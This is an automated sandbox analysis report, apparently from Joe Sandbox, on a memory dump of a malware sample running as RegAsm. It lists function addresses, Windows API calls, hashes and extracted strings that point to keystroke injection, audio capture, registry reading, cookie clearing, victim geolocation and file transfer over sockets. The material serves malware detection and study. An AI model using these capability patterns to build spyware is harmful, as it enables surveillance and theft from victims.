                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: PkG$XMG$NG$NG
                                                  • API String ID: 1649129571-3151166067
                                                  • Opcode ID: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: xUG$NG$NG$TG
                                                  • API String ID: 3114080316-2811732169
                                                  • Opcode ID: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: 3e12fc3dd25856b9ecab2061d3a0a4691b4eaef5d102c7165cd28defd3cf10c6
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-122982132
                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: 7c352b3585a634410ab9138d6cff2a21f89007fdd3bec834ca7dbc2ca3cb0abe
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
